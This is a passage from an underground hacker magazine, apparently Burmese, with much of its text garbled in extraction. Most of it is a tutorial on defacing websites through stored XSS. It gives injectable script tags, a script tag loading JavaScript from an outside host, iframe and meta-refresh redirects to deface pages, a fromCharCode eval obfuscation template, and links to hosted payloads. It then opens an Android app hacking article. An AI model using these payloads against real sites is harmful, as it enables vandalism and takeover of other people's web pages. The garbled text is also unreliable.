144 | P a g e U G M A G A Z I N E V O L 2 Produced By MBH Notice Info ႔ Tag Add Notice ။ ( ႔ Tag ႔) <script>alert(0); </script> Add New Record Title Browse Pdf S t။ Home Page Alert 0 ႔ XSS message box ။ Alert 0 ႔ ႔A t Deface ႔ ။ ( ႔ XSS ႔။ XSS alert bypass ႔႔ ႔ ။) <script>alert(0); </script> ႔ ။ ၂။ ႔ ႔ Hosting ။ Shell ။ https://pastebin.com/H45d88BJ C yourname.js ႔ S upload ႔။ www.yourshellsite.com/yourname.js URL XSS Alert ။ <script src=\"http://www.mmsecurity.net/eval.js\"></script> ။ ႔။ ႔ eval.js Power By Union Of Underground Myanmar Hackers

145 | P a g e U G M A G A Z I N E V O L 2 Produced By MBH ၐ submit ။ Home Page Deface WD ။ ၃။ Shell Folder ။ Folder deface.html Upload ။www.example.com/Folder/yourdeface.html Deface Page ႔ https://pastebin.com/76Cmxjwg Edit <iframe src='http://www.iran118.co.uk/ugv2.html' URL <iframe src='www.example.com/Folder/yourdeface.html' ။ .js ။ ႔S Shell Deface.html ႔ Folder Upload URL /F / ။ Defacement ။ Photo ။ <script src=\"www.example.com/Folder/yourname.js\"></script> ၄။ Free Hosting or Website Shell ႔ .js ။ https://pastebin.com/H45d88BJ yourname.js ႔ S File http://yourjavascript.com/ ႔ upload ။ Power By Union Of Underground Myanmar Hackers

146 | P a g e U G M A G A Z I N E V O L 2 Produced By MBH Processing... The file olo.js has been uploaded.Your javascript link will be sent to [email protected] in 5 minutes...If you have trouble to find the email, just check in bulk folder ၐ။ gmail ။G Recovery ႔။ mail ႔ XSS Deface Script ။ ၅။ Shell or Free Hosting ႔ Website Charcode ။။ http://jdstiles.com/java/cct.html Power By Union Of Underground Myanmar Hackers

147 | P a g e U G M A G A Z I N E V O L 2 Produced By MBH <script language=javascript>eval(String.fromCharCode(PLACE CharCode HERE ))</script> ႔ Charcode .js Save ။ .js http://yourjavascript.com/ ႔ Upload gmail ႔ XSS Defacement ႔။ ၆။ Redirect Defacement ႔ tt :// / t Deface ။ page XSS Alert ႔ ႔ Tag Defacement <META http-equiv=\"refresh\" content=\"1;URL=http://example.com/yourdeface.html \"> Shell JS or XSS Defacement ႔႔ ။ ႔ Thanks for your patient, mr.Gh0st N@0b Power By Union Of Underground Myanmar Hackers

148 | P a g e U G M A G A Z I N E V O L 2 Produced By MBH Power By Union Of Underground Myanmar Hackers

149 | P a g e U G M A G A Z I N E V O L 2 Produced By MBH How I hacked Android App Author – Thin Ba Shane ( http://location-href.com ) Table of Contents  Introduction  First Vulnerability – Insecure Direct Object Reference ( Web )  Second Vulnerability – Insecure Data Storage ( Android )  Third Vulnerability – Missing Functional Level Access Control ( Android ) Introduction ႔ MP ႔ ။M P ႔M A ။ Android ၊ IOS ၊ Windows Operating System ၐ ။ ႔ Android A Develop A develop ။ ႔။ App Sec ႔ ႔ Android App Sec ႔ UG Mangazine ႔ ႔ Android App Sec ။ Android Application Security ။႔ ႔ ႔။ ။ ၊ Android app ႔ Java ႔ ၊ C Native code ႔ ၊ ။ ႔ Android App Security ၊ Web App Sec PHP ႔ ။ ႔ Online php ႔ WA jsp , asp.net ႔ ႔၊ PHP Security ႔ ႔ ။ Android App Sec A D ႔။ Android App ၊ Android ၊ JVM ၊ Dalvik Machine ။ ႔။ Android Architecture ၊A ၊ Power By Union Of Underground Myanmar Hackers